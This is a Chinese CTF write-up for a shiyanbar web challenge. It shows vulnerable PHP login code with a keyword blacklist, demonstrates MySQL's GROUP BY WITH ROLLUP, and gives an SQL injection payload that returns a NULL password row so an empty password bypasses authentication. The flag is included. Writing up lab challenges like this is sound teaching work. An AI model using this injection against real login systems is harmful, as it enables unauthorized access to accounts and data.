实验吧-因缺思汀的绕过

最新推荐文章于 2019-09-05 12:39:00 发布

原创最新推荐文章于 2019-09-05 12:39:00 发布 · 144 阅读

1 ·

CC 4.0 BY-SA版权

因缺思汀的绕过

原题链接

http://ctf5.shiyanbar.com/web/pcat/index.php

分析

查看源码，发现提示source.txt，继续跟进，查看源码。

$con = mysql_connect("XXXXXX","XXXXXX","XXXXXX");
if (!$con){
    die('Could not connect: ' . mysql_error());
}
$db="XXXXXX";
mysql_select_db($db, $con);
$sql="SELECT * FROM interest WHERE uname = '{$_POST['uname']}'";
$query = mysql_query($sql); 
if (mysql_num_rows($query) == 1) { 
    $key = mysql_fetch_array($query);
    if($key['pwd'] == $_POST['pwd']) {
        print "CTF{XXXXXX}";
    }else{
        print "亦可赛艇！";
    }
}else{
    print "一颗赛艇！";
}
mysql_close($con);

代码也比较容易理解，先黑名单过滤，然后先从数据库找uname的数据只能有一条，然后和密码比较，一致则输出flag.

$filter = "and|select|from|where|union|join|sleep|benchmark|,|(|)";

这句话过滤了很多关键词，加上function AttackFilter这个函数起到了过滤的作用，这里是巧妙地用了select过程中用group by with rollup这个统计的方法进行插入查询。我们用mysql做几个小实验就明白这个是怎么用的了！

# 建表
mysql> create table test(
    -> user varchar(100) not null,
    -> pwd varchar(100) not null);
Query OK, 0 rows affected (0.01 sec)

mysql> insert into test values("admin","mypass");
Query OK, 1 row affected (0.00 sec)

mysql> insert into test values("guest","guest");
Query OK, 1 row affected (0.00 sec)

mysql> insert into test values("testss","lol");
Query OK, 1 row affected (0.00 sec)

# 测试with rollup的用法
mysql> select user,pwd,count(user) from test group by pwd with rollup;
+--------+--------+-------------+
| user   | pwd    | count(user) |
+--------+--------+-------------+
| guest  | guest  |           1 |
| testss | lol    |           1 |
| admin  | mypass |           1 |
| admin  | NULL   |           3 |
+--------+--------+-------------+

可以发现对于group by的列，with rollup将不会做任何的操作，而是返回一个NULL，而没有group by的列，则根据前面的count函数做了处理。
更官方的解释，请看这里

mysql> select * from test group by pwd with rollup;
+--------+--------+
| user   | pwd    |
+--------+--------+
| guest  | guest  |
| testss | lol    |
| admin  | mypass |
| admin  | NULL   |
+--------+--------+

mysql> select * from test group by pwd with rollup limit 1;
+-------+-------+
| user  | pwd   |
+-------+-------+
| guest | guest |
+-------+-------+
1 row in set (0.00 sec)

mysql> select * from test group by pwd with rollup limit 1 offset 1;
+--------+-----+
| user   | pwd |
+--------+-----+
| testss | lol |
+--------+-----+
1 row in set (0.00 sec)
mysql> select * from test group by pwd with rollup limit 1 offset 3;
+-------+-----+
| user  | pwd |
+-------+-----+
| admin | NULL |
+-------+-----+

然后我们就看到关键了，这个查询的时候可以想办法
让pwd变成空，而且user这一列用的却是也是存在的字段！
这就很好用了！又有if (mysql_num_rows($query) == 1)知道只要一列。

然后我们构造payload

uname=' or 1=1 group by pwd with rollup limit 1 offset x#&pwd=

然后一个个试出来就行啦。涨姿势！

flag

payload:

uname=' or 1=1 group by pwd with rollup limit 1 offset x#&pwd=
uname=' or 1=1 group by pwd with rollup limit 1 offset 2#&pwd=

flag:
CTF{with_rollup_interesting}

知识点

with rollup统计方法的奇妙用途